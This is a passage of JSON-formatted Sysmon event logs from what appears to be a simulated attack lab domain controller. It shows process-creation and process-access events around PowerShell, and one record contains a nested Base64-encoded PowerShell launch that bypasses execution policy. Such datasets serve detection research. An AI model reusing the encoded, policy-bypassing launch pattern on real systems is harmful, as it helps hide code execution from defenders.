mAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-20CD-5F25-0000-002017A10700}","LogonId":"0x7a117","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453","ParentProcessGuid":"{41C8662E-20CD-5F25-0000-00102BA40700}","ParentProcessId":"3744","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4849,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.205\r\nSourceProcessGUID: {41C8662E-20CD-5F25-0000-00102BA40700}\r\nSourceProcessId: 3744\r\nSourceThreadId: 3996\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {41C8662E-20CD-5F25-0000-0010FEA40700}\r\nTargetProcessId: 4544\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.205","SourceProcessGUID":"{41C8662E-20CD-5F25-0000-00102BA40700}","SourceProcessId":"3744","SourceThreadId":"3996","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{41C8662E-20CD-5F25-0000-0010FEA40700}","TargetProcessId":"4544","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4850,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.205\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20CD-5F25-0000-0010FEA40700}\r\nTargetProcessId: 4544\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.205","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20CD-5F25-0000-0010FEA40700}","TargetProcessId":"4544","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4851,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.205\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.205","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4852,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.205\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.205","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4853,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.205\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.205","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4854,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.205\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.205","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4855,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.205\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.205","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.d